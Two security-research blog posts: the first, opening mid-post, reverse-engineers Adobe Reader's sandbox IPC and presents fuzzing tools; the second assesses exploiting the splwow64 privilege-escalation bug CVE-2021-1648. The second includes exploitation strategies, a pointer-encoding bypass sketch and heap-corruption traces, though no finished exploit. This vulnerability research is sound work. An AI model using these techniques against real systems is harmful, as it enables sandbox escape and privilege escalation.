    size_t channels_count;
    HANDLE server_alive;
    ChannelControl channels[1];
};

And in the IPC shared memory section:

0:009> dd 2a10000
02a10000  0000000f 00000088 00000134 00000001
02a10010  00000010 00000014 00000003 00020134

So we have 15 channels (0xf), a handle to server_alive, and the start of our ChannelControl array.

The server_alive handle is a mutex used to signal if the server has crashed. It's used during tag invocation in SharedMemIPCClient::DoCall, which we'll describe later on. For now, assume that if we WaitForSingleObject on this and it returns WAIT_ABANDONED, the server has crashed.
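
A minimal sketch of that liveness check, assuming (as the behavior above implies) that the broker holds the mutex while healthy:

// server_alive is the mutex handle from IPCControl
bool BrokerCrashed(HANDLE server_alive)
{
  DWORD wait = WaitForSingleObject(server_alive, 0);
  if (wait == WAIT_ABANDONED)
    return true;                // broker died without releasing the mutex
  if (wait == WAIT_OBJECT_0)
    ReleaseMutex(server_alive); // we briefly acquired it; hand it back
  return false;
}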

ChannelControl is a structure that describes a channel, and is again defined as:

struct ChannelControl {
  size_t channel_base;
  volatile LONG state;
  HANDLE ping_event;
  HANDLE pong_event;
  uint32 ipc_tag;
};

The channel_base describes the channel's buffer, i.e. where the CrossCallParams structure can be found. This is an offset from the base of the shared memory section.

state is an enum that describes the state of the channel:

enum ChannelState {
  kFreeChannel = 1,
  kBusyChannel,
  kAckChannel,
  kReadyChannel,
  kAbandonnedChannel
};

The ping and pong events are, as previously described, used to signal to the opposite endpoint that data is ready for consumption. For example, when the client has written out its CrossCallParams and is ready for the server, it signals:

  DWORD wait = ::SignalObjectAndWait(channel[num].ping_event,
                                     channel[num].pong_event,
                                     kIPCWaitTimeOut1,
                                     FALSE);

When the server has completed processing the request, the pong_event is signaled and the client reads back the call result.

A channel is fetched via SharedMemIPCClient::LockFreeChannel, which is invoked when GetBuffer is called. This simply identifies a channel in the IPCControl array wherein state == kFreeChannel, and sets it to kBusyChannel. With a channel, we can now write out our CrossCallParams structure to the shared memory buffer. Our target buffer begins at channel->channel_base.
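
The acquisition itself is just an interlocked sweep over the channel array. A hedged sketch, reusing the structures defined above:

LONG LockFreeChannel(IPCControl* ipc)
{
  for (size_t i = 0; i < ipc->channels_count; i++) {
    // atomically claim the channel only if it is still free
    if (InterlockedCompareExchange(&ipc->channels[i].state,
                                   kBusyChannel, kFreeChannel) == kFreeChannel)
      return (LONG)i;
  }
  return -1;  // every channel is busy
}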

Writing out the CrossCallParams has a few nuances. First, the number of actual parameters is NUMBER_PARAMS+1. According to the source:

// Note that the actual number of params is NUMBER_PARAMS + 1
// so that the size of each actual param can be computed from the difference
// between one parameter and the next down. The offset of the last param
// points to the end of the buffer and the type and size are undefined.

This can be observed in the CopyParamIn function:

param_info_[index + 1].offset_ = Align(param_info_[index].offset_ +
                                            size);
param_info_[index].size_ = size;
param_info_[index].type_ = type;

Note the offset written is the offset for index+1. In addition, this offset is aligned. This is a pretty simple function that byte aligns the delta inside the channel buffer:

// Increases |value| until there is no need for padding given the 2*pointer
// alignment on the platform. Returns the increased value.
// NOTE: This might not be good enough for some buffer. The OS might want the
// structure inside the buffer to be aligned also.
size_t Align(size_t value) {
  size_t alignment = sizeof(ULONG_PTR) * 2;
  return ((value + alignment - 1) / alignment) * alignment;
}

Because the Reader process is x86, the alignment is always 8; a 0x86-byte parameter, for example, is padded out to 0x88.

The pseudo-code for writing out our CrossCallParams can be distilled into the following:

write_uint(buffer,     tag);
write_uint(buffer+0x4, is_in_out);

// reserve 52 bytes for CrossCallReturn
write_crosscall_return(buffer+0x8);

write_uint(buffer+0x3c, param_count);

// calculate initial delta 
delta = ((param_count + 1) * 12) + 12 + 52;

// write out the first argument's offset 
write_uint(buffer + (0x4 * (3 * 0 + 0x11)), delta);

for idx in range(param_count):
    
    write_uint(buffer + (0x4 * (3 * idx + 0x10)), type);
    write_uint(buffer + (0x4 * (3 * idx + 0x12)), size);

    // ...write out argument data. This varies based on the type

    // calculate new delta
    delta = Align(delta + size)
    write_uint(buffer + (0x4 * (3 * (idx+1) + 0x11)), delta);

// finally, write the tag out to the ChannelControl struct
write_uint(channel_control->tag, tag);

Once the CrossCallParams structure has been written out, the sandboxed process signals the ping_event and the broker is triggered.

Broker side handling is fairly straightforward. The server registers a ping_event handler during SharedMemIPCServer::Init:

 thread_provider_->RegisterWait(this, service_context->ping_event,
                                ThreadPingEventReady, service_context);

RegisterWait is just a thread pool wrapper around a call to RegisterWaitForSingleObject.

The ThreadPingEventReady function marks the channel as kAckChannel, fetches a pointer to the provided buffer, and invokes InvokeCallback. Once this returns, it copies the CrossCallReturn structure back to the channel and signals the pong_event.

InvokeCallback parses out the buffer and handles validation of data at a high level (ensures strings are strings, buffers and sizes match up, etc.). This is probably a good time to document the supported argument types. There are 10 types in total, two of which are placeholders:

ArgType = {
    0: "INVALID_TYPE",
    1: "WCHAR_TYPE", 
    2: "ULONG_TYPE",
    3: "UNISTR_TYPE", # treated same as WCHAR_TYPE
    4: "VOIDPTR_TYPE",
    5: "INPTR_TYPE",
    6: "INOUTPTR_TYPE",
    7: "ASCII_TYPE",
    8: "MEM_TYPE", 
    9: "LAST_TYPE" 
}

These are taken from internal_types, but you'll notice there are two additional types, ASCII_TYPE and MEM_TYPE, which are unique to Reader. ASCII_TYPE is, as expected, a simple 7-bit ASCII string. MEM_TYPE is a memory structure used by the broker to read data out of the sandboxed process, i.e. for more complex types that can't be trivially passed via the API. It's additionally used for data blobs, such as PNG images, enhanced-format datafiles, and more.

Some of these types should be self-explanatory; WCHAR_TYPE is naturally a wide char, ASCII_TYPE an ascii string, and ULONG_TYPE a ulong. Let's look at a few of the non-obvious types, however: VOIDPTR_TYPE, INPTR_TYPE, INOUTPTR_TYPE, and MEM_TYPE.

Starting with VOIDPTR_TYPE, this is a standard type in the Chromium sandbox so we can just refer to the source code. SharedMemIPCServer::GetArgs calls GetParameterVoidPtr. Simply, once the value itself is extracted it's cast to a void ptr:

*param = *(reinterpret_cast<void**>(start));

This allows tags to reference objects and data within the broker process itself. An example might be NtOpenProcessToken, whose first parameter is a handle to the target process. This would be retrieved first by a call to OpenProcess, handed back to the child process, and then supplied in any future calls that may need to use the handle as a VOIDPTR_TYPE.

In the Chromium source code, INPTR_TYPE is extracted as a raw value via GetRawParameter and no additional processing is performed. However, in Adobe Reader, it's actually extracted in the same way INOUTPTR_TYPE is.

INOUTPTR_TYPE is wrapped as a CountedBuffer and may be written to during the IPC call. For example, if CreateProcessW is invoked, the PROCESS_INFORMATION pointer will be of type INOUTPTR_TYPE.

The final type is MEM_TYPE, which is unique to Adobe Reader. We can define the structure as:

struct MEM_TYPE {
  HANDLE hProcess;
  DWORD lpBaseAddress;
  SIZE_T nSize;
};

As mentioned, this type is primarily used to transfer data buffers to and from the broker process. It seems crazy: each tag is responsible for performing its own validation of the provided values before they're used in any ReadProcessMemory/WriteProcessMemory call.
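
To make that concrete, here's a hedged sketch of how a tag handler might consume a MEM_TYPE argument. The helper is mine, not Reader's; the point is that hProcess, lpBaseAddress, and nSize all arrive attacker-influenced and are only as validated as the individual tag bothers to make them:

// arg comes straight out of the deserialized CrossCallParams
BOOL ReadMemArg(const MEM_TYPE* arg, BYTE* out, SIZE_T outSize)
{
  SIZE_T read = 0;
  if (arg->nSize > outSize)
    return FALSE;
  return ReadProcessMemory(arg->hProcess,
                           (LPCVOID)(ULONG_PTR)arg->lpBaseAddress,
                           out, arg->nSize, &read) && read == arg->nSize;
}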

Once the broker has parsed out the passed arguments, it fetches the context dispatcher and identifies our tag handler:

ContextDispatcher = *(int (__thiscall ****)(_DWORD, int *, int *))(Context + 24);// fetch dispatcher function from Server control
target_info = Context + 28;
handler = (**ContextDispatcher)(ContextDispatcher, &ipc_params, &callback_generic);// PolicyBase::OnMessageReady

The handler is fetched from PolicyBase::OnMessageReady, which winds up calling Dispatcher::OnMessageReady. This is a pretty simple function that crawls the registered IPC tag list for the correct handler. We finally hit InvokeCallbackArgs, unique to Reader, which invokes the handler with the proper argument count:

switch ( ParamCount )
  {
    case 0:
      v7 = callback_generic(_this, CrossCallParamsEx);
      goto LABEL_20;
    case 1:
      v7 = ((int (__thiscall *)(void *, int, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args);
      goto LABEL_20;
    case 2:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD))callback_generic)(_this, CrossCallParamsEx, *args, args[1]);
      goto LABEL_20;
    case 3:
      v7 = ((int (__thiscall *)(void *, int, _DWORD, _DWORD, _DWORD))callback_generic)(
             _this,
             CrossCallParamsEx,
             *args,
             args[1],
             args[2]);
      goto LABEL_20;

[...]

In total, Reader supports tag functions with up to 17 arguments. I have no idea why that would be necessary, but it is. Additionally note the first two arguments to each tag handler: context handler (dispatcher) and CrossCallParamsEx. This last structure is actually the broker's version of a CrossCallParams with more paranoia.

A single function is used to register IPC tags, called from a single initialization function, making it relatively easy for us to scrape them all at runtime. Pulling out all of the IPC tags can be done both statically and dynamically; the former is far easier, the latter more accurate. I've implemented a static generator using IDAPython, available in this project's repository (ida_find_tags.py), which can be used to pull all supported IPC tags out of Reader along with their parameters. This is not going to be wholly indicative of all possible calls, however. During initialization of the sandbox, many feature checks are performed to probe the availability of certain capabilities. If these fail, the tag is not registered.

Tags are given a handle to CrossCallParamsEx, which gives them access to the CrossCallReturn structure. Repeated from above, this is defined as:

struct CrossCallReturn {
  uint32 tag_;
  uint32 call_outcome;
  union {
    NTSTATUS nt_status;
    DWORD win32_result;
  };

  HANDLE handle;
  uint32 extended_count;
  MultiType extended[kExtendedReturnCount];
};

This 52-byte structure is embedded in the CrossCallParams transferred by the sandboxed process. Once the tag has returned from execution, the following occurs:

 if (error) {
    if (handler)
      SetCallError(SBOX_ERROR_FAILED_IPC, call_result);
  } else {
    memcpy(call_result, &ipc_info.return_info, sizeof(*call_result));
    SetCallSuccess(call_result);
    if (params->IsInOut()) {
      // Maybe the params got changed by the broker. We need to upadte the
      // memory section.
      memcpy(ipc_buffer, params.get(), output_size);
    }
  }

and the sandboxed process can finally read out its result. Note that this mechanism does not allow for the exchange of more complex types, hence the availability of MEM_TYPE. The final step is signaling the pong_event, completing the call and freeing the channel.

Tags

Now that we understand how the IPC mechanism itself works, let's examine the implemented tags in the sandbox. Tags are registered during initialization by a function we'll call InitializeSandboxCallback. This is a large function that handles allocating sandbox tag objects and invoking their respective initializers. Each initializer uses a function, RegisterTag, to construct and register individual tags. A tag is defined by a SandTag structure:

typedef struct SandTag {
  DWORD IPCTag;
  ArgType Arguments[17];
  LPVOID Handler;
} SandTag;

The Arguments array is initialized to INVALID_TYPE and ignored if the tag does not use all 17 slots. Here's an example of a tag structure:

.rdata:00DD49A8 IpcTag3         dd 3                    ; IPCTag
.rdata:00DD49A8                                         ; DATA XREF: 000190FA↑r
.rdata:00DD49A8                                         ; 00019140↑o ...
.rdata:00DD49A8                 dd 1, 6 dup(2), 0Ah dup(0); Arguments
.rdata:00DD49A8                 dd offset FilesystemDispatcher__NtCreateFile; Handler

Here we see tag 3 with 7 arguments; the first is WCHAR_TYPE and the remaining 6 are ULONG_TYPE. This lines up with what we know to be the NtCreateFile tag handler.

Each tag is part of a group that denotes its behavior. There are 20 groups in total:

SandboxFilesystemDispatcher
SandboxNamedPipeDispatcher
SandboxProcessThreadDispatcher
SandboxSyncDispatcher
SandboxRegistryDispatcher
SandboxBrokerServerDispatcher
SandboxMutantDispatcher
SandboxSectionDispatcher
SandboxMAPIDispatcher
SandboxClipboardDispatcher
SandboxCryptDispatcher
SandboxKerberosDispatcher
SandboxExecProcessDispatcher
SandboxWininetDispatcher
SandboxSelfhealDispatcher
SandboxPrintDispatcher
SandboxPreviewDispatcher
SandboxDDEDispatcher
SandboxAtomDispatcher
SandboxTaskbarManagerDispatcher

The names were extracted either from the Reader binary itself or through correlation with Chromium. Each dispatcher implements an initialization routine that invokes RegisterDispatchFunction for each tag. The number of registered tags will differ depending on the installation, version, features, etc. of the Reader process. SandboxBrokerServerDispatcher, for example, can vary by approximately 25 tags.

Instead of providing a description of each dispatcher in this post, I've instead put together a separate page, which can be found here. This page can be used as a tag reference and has some general information about each. Over time I'll add my notes on the calls. I've additionally pushed the scripts used to extract tag information from the Reader binary and generate the table to the sander repository detailed below.

libread

Over the course of this research, I developed a library and set of tools for examining and exercising the Reader sandbox. The library, libread, was developed to programmatically interface with the broker in real time, allowing for quickly exercising components of the broker and dynamically reversing various facilities. In addition, the library was critical during my fuzzing expeditions. All of the fuzzing tools and data will be available in the next post in this series.

libread is fairly flexible and easy to use, but still pretty rudimentary and, of course, built off of my reverse engineering efforts. It won't be feature complete nor even completely accurate. Pull requests are welcome.

The library implements all of the notable structures and provides a few helper functions for locating the ServerControl from the broker process. As we've seen, a ServerControl is a broker's view of a channel and it is held by the broker alone. This means it's not somewhere predictable in shared memory and we've got to scan the broker's memory hunting it. From the sandbox side there is also a find_memory_map helper for locating the base address of the shared memory map.
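
From the sandboxed side, one way to hunt the section down is to walk our own address space looking for a mapped region of the right shape. This is a hedged sketch of the idea rather than libread's exact implementation; the 0x20000 size and the 15-channel header come from the observations above:

#include <windows.h>

struct IPCControl_ {
  SIZE_T channels_count;
  HANDLE server_alive;
  // ChannelControl channels[] follows
};

void* FindIpcSection(void)
{
  MEMORY_BASIC_INFORMATION mbi;
  for (BYTE* p = 0; VirtualQuery(p, &mbi, sizeof(mbi)); p += mbi.RegionSize) {
    if (mbi.State == MEM_COMMIT && mbi.Type == MEM_MAPPED &&
        mbi.RegionSize == 0x20000) {
      IPCControl_* ipc = (IPCControl_*)mbi.BaseAddress;
      if (ipc->channels_count == 15)  // sanity check the header
        return mbi.BaseAddress;
    }
  }
  return 0;
}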

In addition to this library I'm releasing sander. This is a command line tool that consumes libread to provide some useful functionality for inspecting the sandbox:

$ sander.exe -h
[-] sander: [action] <pid>
          -m   -  Monitor mode
          -d   -  Dump channels
          -t   -  Trigger test call (tag 62)
          -c   -  Capture IPC traffic and log to disk
          -h   -  Print this menu

The most useful functionality provided here is the -m flag. This allows one to monitor the IPC calls and their arguments in real time:

$ sander.exe -m 6132
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 266 1 Parameters
      WCHAR_TYPE: _WVWT*&^$
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 34  1 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 247 2 Parameters
      WCHAR_TYPE: C:\Users\bja\desktop\test.pdf
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: Software\Adobe\Acrobat Reader\DC\SessionManagement
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[6020] ESP: 037dfca4    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWindowsCurrent
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 0000043c
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 16  6 Parameters
      WCHAR_TYPE: cWin0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000434
      ULONG_TYPE: 000f003f
      ULONG_TYPE: 00000000
      ULONG_TYPE: 00000000
[5184] ESP: 02e1f764    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cTab0
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 00000298
      ULONG_TYPE: 000f003f
[2572] ESP: 0335fd5c    Buffer 029f0134 Tag 17  4 Parameters
      WCHAR_TYPE: cPathInfo
      ULONG_TYPE: 00000040
      VOIDPTR_TYPE: 000003cc
      ULONG_TYPE: 000f003f

We're also able to dump all IPC calls in the broker's channels (-d), which can help debug threading issues when fuzzing, and trigger a test IPC call (-t). This latter function demonstrates how to send your own IPC calls via libread as well as allows you to test out additional tooling.

The last available feature is the -c flag, which captures all IPC traffic and logs the channel buffer to a file on disk. I used this primarily to seed part of my corpus during fuzzing efforts, as well as to aid during some reversing efforts. It's extremely useful for replaying requests and gathering a baseline corpus of real traffic. We'll discuss this further in forthcoming posts.

That about concludes this initial post. Next up I'll discuss the various fuzzing strategies used on this unique interface, the frustrating amount of failure, and the bugs shaken out.


On Exploiting CVE-2021-1648 (splwow64 LPE)

10 March 2021 at 21:10

In this post we'll examine the exploitability of CVE-2021-1648, a privilege escalation bug in splwow64. I actually started writing this post to organize my notes on the bug and subsystem, and was initially skeptical of its exploitability. I went back and forth on the notion, ultimately ditching the bug. Regardless, organizing notes and writing blogs can be a valuable exercise! The vector is useful, seems to have a lot of attack surface, and will likely crop up again unless Microsoft performs a serious exorcism on the entire spooler architecture.

This bug was first detailed by Google Project Zero (GP0) on December 23, 2020[0]. While it's unclear from the original GP0 description if the bug was discovered in the wild, k0shl later detailed that it was his bug, reported to MSRC in July 2020[1] and only just patched in January of 2021[2]. It seems, then, that it was a case of bug collision. The bug is a usermode crash in the splwow64 process, caused by a wild memcpy in one of the LPC endpoints. This could lead to a privilege escalation from a low IL to medium.

This particular vector has a sordid history that's probably worth briefly detailing. In short, splwow64 is used to host 64-bit usermode printer drivers and implements an LPC endpoint, thus allowing 32-bit processes access to 64-bit printer drivers. This vector was popularized by Kaspersky in their great analysis of Operation Powerfall, an APT they detailed in August of 2020[3]. As part of the chain they analyzed CVE-2020-0986, effectively the same bug as CVE-2021-1648, as noted by GP0. In turn, CVE-2020-0986 is essentially the same bug as another found in the wild, CVE-2019-0880[4]. Each time Microsoft failed to adequately patch the bug, leading to a new variant: first there were no pointer checks, then it was guarded by driver cookies, then offsets. We'll look at how they finally chose to patch the bug later on.

I won't regurgitate how the LPC interface works; for that, I recommend reading Kaspersky's Operation Powerfall post[3] as well as the blog by ByteRaptor[4]. Both of these cover the architecture of the vector well enough to understand what's happening. Instead, we'll focus on what's changed since CVE-2020-0986.

To catch you up very briefly, though: splwow64 exposes an LPC endpoint that any process can connect to and send requests. These requests carry opcodes and input parameters to a variety of printer functions (OpenPrinter, ClosePrinter, etc.). These functions occasionally require pointers as input, and thus the input buffer needs to support those.

As alluded to, Microsoft chose to use offsets into the LPC request buffers instead of raw pointers. Since the input/output addresses were to be used in memcpy's, they need to be translated back from offsets to absolute addresses. The functions UMPDStringFromPointerOffset, UMPDPointerFromOffset, and UMPDOffsetFromPointer were added to accommodate this need. Here's UMPDPointerFromOffset:

int64 UMPDPointerFromOffset(unsigned int64 *lpOffset, int64 lpBufStart, unsigned int dwSize)
{
  unsigned int64 Offset;

  if ( lpOffset && lpBufStart )
  {
    Offset = *lpOffset;
    if ( !*lpOffset )
      return 1;
    if ( Offset <= 0x7FFFFFFF && Offset + dwSize <= 0x7FFFFFFF )
    {
      *lpOffset = Offset + lpBufStart;
      return 1;
    }
  }
  return 0;
}

So as per the GP0 post, the buffer addresses are indeed restricted to <=0x7fffffff. Implicit in this is also the fact that our offset is unsigned, meaning we can only work with positive numbers; therefore, if our target address is somewhere below our lpBufStart, we're out of luck.

This new offset strategy kills the previous techniques used to exploit this vulnerability. Under CVE-2020-0986, they exploited the memcpy by targeting a global function pointer. When request 0x6A is called, a function (bLoadSpooler) is used to resolve a dozen or so winspool functions used for interfacing with printers:

These global variables are "protected" by RtlEncodePointer, as detailed by Kaspersky[3], but this is relatively trivial to break when executing locally. Using the memcpy with arbitrary src/dst addresses, they were able to overwrite the function pointers and replace one with a call to LoadLibrary.
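
Breaking the encoding comes down to recovering the remote process cookie that RtlEncodePointer mixes in. A hedged sketch of the known approach, using the undocumented ProcessCookie information class (36):

#include <windows.h>
#include <winternl.h>

typedef NTSTATUS (NTAPI *NtQIP_t)(HANDLE, ULONG, PVOID, ULONG, PULONG);

ULONG GetRemoteProcessCookie(HANDLE hProcess)
{
  ULONG cookie = 0, retLen = 0;
  NtQIP_t NtQIP = (NtQIP_t)GetProcAddress(GetModuleHandleW(L"ntdll"),
                                          "NtQueryInformationProcess");
  // 36 == ProcessCookie; with the cookie in hand, the XOR/rotate applied
  // by RtlEncodePointer can be reversed offline
  if (NtQIP && NtQIP(hProcess, 36, &cookie, sizeof(cookie), &retLen) >= 0)
    return cookie;
  return 0;
}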

Unfortunately, now that offsets are used, we can no longer target any arbitrary address. Not only are we restricted to 32-bit addresses, but we are also restricted to addresses >= the message buffer and <= 0x7fffffff.

I had a few thoughts/strategies here. My first attempt was to target UMPD cookies. This was part of a mitigation added after 0986 as again described by Kaspersky. Essentially, in order to invoke the other functions available to splwow64, we need to open a handle to a target printer. Doing this, GDI creates a cookie for us and stores it in an internal linked list. The cookie is created by LoadUserModePrinterDriverEx and is of type UMPD:

typedef struct _UMPD {
    DWORD               dwSignature;        // data structure signature
    struct _UMPD *      pNext;             // linked list pointer
    PDRIVER_INFO_2W     pDriverInfo2;       // pointer to driver info
    HINSTANCE           hInst;              // instance handle to user-mode printer driver module
    DWORD               dwFlags;            // misc. flags
    BOOL                bArtificialIncrement; // indicates if the ref cnt has been bumped up to
    DWORD               dwDriverVersion;    // version number of the loaded driver
    INT                 iRefCount;          // reference count
    struct ProxyPort *  pp;                 // UMPD proxy server
    KERNEL_PVOID        umpdCookie;         // cookie returned back from proxy
    PHPRINTERLIST       pHandleList;        // list of hPrinter's opened on the proxy server
    PFN                 apfn[INDEX_LAST];   // driver function table
} UMPD, *PUMPD;

When a request for a printer action comes in, GDI will check that the request contains a valid printer handle and that a cookie for it exists. Conveniently, there's a function pointer table at the end of the UMPD structure called by a number of LPC functions. By using the pointer to the head of the cookie list, a global variable, we can inspect the list:

0:006> dq poi(g_ulLastUmpdCookie-8)
00000000`00bce1e0  00000000`fedcba98 00000000`00000000
00000000`00bce1f0  00000000`00bcdee0 00007ffb`64dd0000
00000000`00bce200  00000000`00000001 00000001`00000000
00000000`00bce210  00000000`00000000 00000000`00000001
00000000`00bce220  00000000`00bc8440 00007ffb`64dd2550
00000000`00bce230  00007ffb`64dd2d20 00007ffb`64dd2ac0
00000000`00bce240  00007ffb`64dd2de0 00007ffb`64dd30f0
00000000`00bce250  00000000`00000000
0:006> dps poi(g_ulLastUmpdCookie-8)+(8*9) l5
00000000`00bce228  00007ffb`64dd2550 mxdwdrv!DrvEnablePDEV
00000000`00bce230  00007ffb`64dd2d20 mxdwdrv!DrvCompletePDEV
00000000`00bce238  00007ffb`64dd2ac0 mxdwdrv!DrvDisablePDEV
00000000`00bce240  00007ffb`64dd2de0 mxdwdrv!DrvEnableSurface
00000000`00bce248  00007ffb`64dd30f0 mxdwdrv!DrvDisableSurface

This is the first UMPD cookie entry, and we can see its function table contains 5 entries. Conveniently all of these heap addresses are 32-bit.

Unfortunately, none of these functions are called from splwow64 LPC. When processing the LPC requests, the following check is performed on the received buffer:

if ( (MType = lpMsgBuf[1], MType >= 0x6A) && (MType <= 0x6B || MType - 109 <= 7) )

This effectively limits the functions we can call to 0x6a, 0x6b, and 0x6d through 0x74, and the only times the function tables are referenced are prior to 0x6a.
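
Rewritten for readability (MType is unsigned, so the subtraction underflows for anything below 109):

// 109 == 0x6D; the unsigned compare makes 0x6C and everything >= 0x75 fail
bool reachable = (MType >= 0x6A) &&
                 (MType <= 0x6B || (MType - 109u) <= 7u);
// reachable tags: 0x6A, 0x6B, and 0x6D..0x74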

Another strategy I looked at was abusing the fact that request buffers are allocated from the same heap, and thus linear. Essentially, I wanted to see if I could TOCTTOU the buffer by overwriting the memcpy destination after it's transformed from an offset to an address, but before it's processed. Since the splwow64 process is disposable and we can crash it as often as we'd like without impacting system stability, it seems possible. After tinkering with heap allocations for a while, I discovered a helpful primitive.

When a request comes into the LPC server, splwow64 will first allocate a buffer and then copy the request into it:

MessageSize = 0;
if ( *(_WORD *)ProxyMsg == 0x20 && *((_QWORD *)this + 9) )
{
  MessageSize = *((_DWORD *)ProxyMsg + 10);
  if ( MessageSize - 16 > 0x7FFFFFEF )
    goto LABEL_66;
  lpMsgBuf = (unsigned int *)operator new[](MessageSize);
}

...

if ( lpMsgBuf )
{
  rMessageSize = MessageSize;
  memcpy_s(lpMsgBuf, MessageSize, *((const void *const *)ProxyMsg + 6), MessageSize);
  ...
}

Notice there are effectively no checks on the message size; this gives us the ability to allocate chunks of arbitrary size. What's more is that once the request has finished processing, the output is copied back to the memory view and the buffer is released. Since the Windows heap aggressively reuses freed chunks for same-sized requests, we can obtain reliable read/write into another message buffer. Here's the leaked heap address after several runs:

PortView 1008 heap: 0x0000000000DD9E90
PortView 1020 heap: 0x0000000002B43FE0
PortView 1036 heap: 0x0000000000DD9E90
PortView 1048 heap: 0x0000000002B43FE0
PortView 1060 heap: 0x0000000000DD9E90
PortView 1072 heap: 0x0000000002B43FE0
PortView 1084 heap: 0x0000000000DD9E90
PortView 1096 heap: 0x0000000002B43FE0
PortView 1108 heap: 0x0000000000DD9E90
PortView 1120 heap: 0x0000000002B43FE0
PortView 1132 heap: 0x0000000000DD9E90
PortView 1144 heap: 0x0000000002B43FE0
PortView 1156 heap: 0x0000000000DD9E90
PortView 1168 heap: 0x0000000002B43FE0
PortView 1180 heap: 0x0000000000DD9E90
PortView 1192 heap: 0x0000000002B43FE0
PortView 1204 heap: 0x0000000000DD9E90
PortView 1216 heap: 0x0000000002B43FE0
PortView 1228 heap: 0x0000000000DD9E90
PortView 1240 heap: 0x0000000002B43FE0

Since we can only write to addresses ahead of ours, we can use 0xdd9e90 to write into 0x2b43fe0 (offset of 0x1d6a150). Note that these allocations are coming out of the front-end allocator due to their size, but as previously mentioned, we've got a lot of control there.
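
The reuse behavior itself is easy to demonstrate in isolation. A toy example, assuming the LFH bucket for this size is already warm; the freed slot is typically handed right back, much like the alternating PortView addresses above:

#include <windows.h>
#include <stdio.h>

int main(void)
{
  HANDLE heap = GetProcessHeap();
  for (int i = 0; i < 8; i++) {
    void* p = HeapAlloc(heap, 0, 0x300);  // same-size bucket as our message
    printf("alloc %d: %p\n", i, p);
    HeapFree(heap, 0, p);
  }
  return 0;
}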

After a few hours and a lot of threads, I abandoned this approach as I was unable to trigger an appropriately timed overwrite. I found a memory leak in the port connection code, but it's tiny (0x18 bytes) and doesn't improve the odds, no matter how much pressure I put on the heap. I next attempted to target the message type field; maybe the connection timing was easier to land. Recall that splwow64 restricts the message type we can request. This is because certain message types are considered "privileged". How privileged, you ask? Well, let's see what 0x76 does:

case 0x76u:
  v3 = *(_QWORD *)(lpMsgBuf + 32);
  if ( v3 )
  {
    memcpy_0(*(void **)(lpMsgBuf + 32), *(const void **)(lpMsgBuf + 24), *(unsigned int *)(lpMsgBuf + 40));
    *a2 = v3;
  }

A fully controlled memcpy with zero checks on the values passed. If we could gain access to this we could use the old techniques used to exploit this vulnerability.

After rigging up some threads to spray, I quickly identified a crash:

(1b4.1a9c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
ntdll!RtlpAllocateHeap+0x833:
00007ff9`ab669e83 4d8b4a08        mov     r9,qword ptr [r10+8] ds:00000076`00000008=????????????????
0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff9`ab6673d4     : 00000000`01500000 00000000`00800003 00000000`00002000 00000000`00002010 : ntdll!RtlpAllocateHeap+0x833
01 00007ff9`ab6b76e7     : 00000000`00000000 00000000`012a0180 00000000`00000000 00000000`00000000 : ntdll!RtlpAllocateHeapInternal+0x6d4
02 00007ff9`ab6b75f9     : 00000000`01500000 00000000`00000000 00000000`012a0180 00000000`00000080 : ntdll!RtlpAllocateUserBlockFromHeap+0x63
03 00007ff9`ab667eda     : 00000000`00000000 00000000`00000310 00000000`000f0000 00000000`00000001 : ntdll!RtlpAllocateUserBlock+0x111
04 00007ff9`ab666e2c     : 00000000`012a0000 00000000`00000000 00000000`00000300 00000000`00000000 : ntdll!RtlpLowFragHeapAllocFromContext+0x88a
05 00007ff9`a9f39d40     : 00000000`00000000 00000000`00000300 00000000`00000000 00007ff9`a9f70000 : ntdll!RtlpAllocateHeapInternal+0x12c
06 00007ff6`faeac57f     : 00000000`00000300 00000000`00000000 00000000`01509fd0 00000000`00000000 : msvcrt!malloc+0x70
07 00007ff6`faea7c76     : 00000000`00000300 00000000`01509fd0 00000000`015018e0 00000000`00000000 : splwow64!operator new+0x23
08 00007ff6`faea8ada     : 00000000`00000000 00000000`01501678 00000000`0150e340 00000000`0150e4f0 : splwow64!TLPCMgr::ProcessRequest+0x9e

That's the format of our spray, but you'll notice it's crashing during allocation. Basically, the message buffer chunk was freed and we've managed to overwrite the freelist chunk's forward link prior to it being reused. Once our next request comes in, it attempts to allocate a chunk out of this sized bucket and crashes walking the list.

Notably, we can also corrupt a busy chunk's header, leading to a crash during the free process:

0:006> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ffe`1d5b7e42     : 00000000`00000000 00007ffe`1d6187f0 00000000`00000003 00000000`014d0000 : ntdll!RtlReportCriticalFailure+0x56
01 00007ffe`1d5b812a     : 00000000`00000003 00000000`02d7f440 00000000`014d0000 00000000`014d9fc8 : ntdll!RtlpHeapHandleError+0x12
02 00007ffe`1d5bdd61     : 00000000`00000000 00000000`014d0150 00000000`00000000 00000000`014d9fd0 : ntdll!RtlpHpHeapHandleError+0x7a
03 00007ffe`1d555869     : 00000000`014d9fc0 00000000`00000055 00000000`00000000 00007ffe`00000027 : ntdll!RtlpLogHeapFailure+0x45
04 00007ffe`1d4c0df1     : 00000000`014d02e8 00000000`00000055 00000000`00000001 00000000`00000055 : ntdll!RtlpHeapFindListLookupEntry+0x94029
05 00007ffe`1d4c480b     : 00000000`014d0000 00000000`014d9fc0 00000000`014d9fc0 00000000`00000080 : ntdll!RtlpFindEntry+0x4d
